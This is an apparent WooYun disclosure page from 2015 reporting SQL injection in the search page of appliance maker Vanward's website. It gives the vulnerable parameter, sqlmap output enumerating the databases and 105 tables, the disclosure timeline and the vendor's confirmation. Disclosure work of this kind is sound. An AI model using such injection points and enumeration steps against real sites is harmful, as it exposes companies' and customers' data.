当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142823

漏洞标题:广东万和新电气官网SQL注射(泄露十几万用户信息/燃气套餐/各种反馈信息)

相关厂商:广东万和新电气

漏洞作者: 路人甲

提交时间:2015-09-22 18:06

修复时间:2015-11-09 17:18

公开时间:2015-11-09 17:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

广东万和新电气官网SQL注射(泄露十几万用户信息/燃气套餐/各种反馈信息)

详细说明:

http://**.**.**.**/News/NewsSearch.aspx?Search=a 存在注入

漏洞证明:

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[16:57:38] [INFO] fetching database names
[16:57:38] [INFO] the SQL query used returns 7 entries
[16:57:38] [INFO] resumed: master
[16:57:38] [INFO] resumed: model
[16:57:38] [INFO] resumed: msdb
[16:57:38] [INFO] resumed: ReportServer
[16:57:38] [INFO] resumed: ReportServerTempDB
[16:57:38] [INFO] resumed: tempdb
[16:57:38] [INFO] resumed: vanward_web
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] vanward_web
[16:57:38] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'
[*] shutting down at 16:57:38


Database: vanward_web
[105 tables]
+--------------------------+
| ActingMembers |
| Admins |
| Aerospace |
| Agents |
| Area |
| Authorities |
| Categories |
| Columns_Table |
| Demo |
| EN_Categories |
| EN_Links |
| EN_Products |
| EN_Questions |
| Gongcheng |
| Home |
| HomeCommendProds |
| HybridProduct |
| HybridType |
| Jurisdiction |
| Modules |
| NewCenterBind |
| NewCenterBook |
| NewCenterPic |
| NewCenterProposal |
| NewsysProduct |
| NewsysProductype |
| NewsysProposal |
| NewsysProvince |
| OrderForm |
| OrderProducts |
| ParameterValues |
| Parameters |
| ProdCondTypeRelation |
| ProdCondTypes |
| Products |
| ProgramType |
| Programs |
| ProgramsProductType |
| ProgramsProducts |
| Questions |
| RecommendUnitProds |
| Resume |
| Rocket |
| STravel |
| Schuster_Contacts |
| Schuster_Download |
| Schuster_DownloadType |
| Schuster_MenuType |
| Schuster_News |
| Schuster_Products |
| Schuster_ProductsImg |
| Series |
| ServiceNetwork |
| Stocks |
| Technologies |
| TechnologyRelation |
| UserJob |
| UserList |
| VanwardMessage |
| VanwardMessageE |
| VanwardProdMessage |
| VanwardProdMessage2 |
| VanwardStore |
| aboutVanward |
| aboutVanwardE |
| anniversary |
| engineer |
| flashImg |
| humanRe |
| jobs |
| kitchen_news |
| kitchen_pic |
| lucky_double_date |
| lucky_double_num |
| lucky_double_user |
| lucky_double_video |
| minisite_concer |
| minisite_newstable |
| minisite_picture |
| newdefault |
| newsVideo |
| pangolin_test_table |
| phone_Install |
| phone_Maintenance |
| phone_News |
| phone_Parameters_Coll |
| phone_Parts |
| phone_Product |
| phone_Product_Img |
| phone_Product_Parameters |
| phone_Product_Selling |
| phone_Product_Type |
| phone_Selling_Coll |
| phone_Shopping |
| phone_Type_Parameters |
| phone_Type_Selling |
| phone_YearImg |
| phone_YearTable |
| prototype |
| rabbit |
| sqlmapoutput |
| sysdiagrams |
| vanwardNews |
| vanwardType |
| vanwardTypeE |
+--------------------------+
[16:44:01] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 106 times
[16:44:01] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'

当前库的表段

1111.png

2222.png

333.png


444.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-25 17:17

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无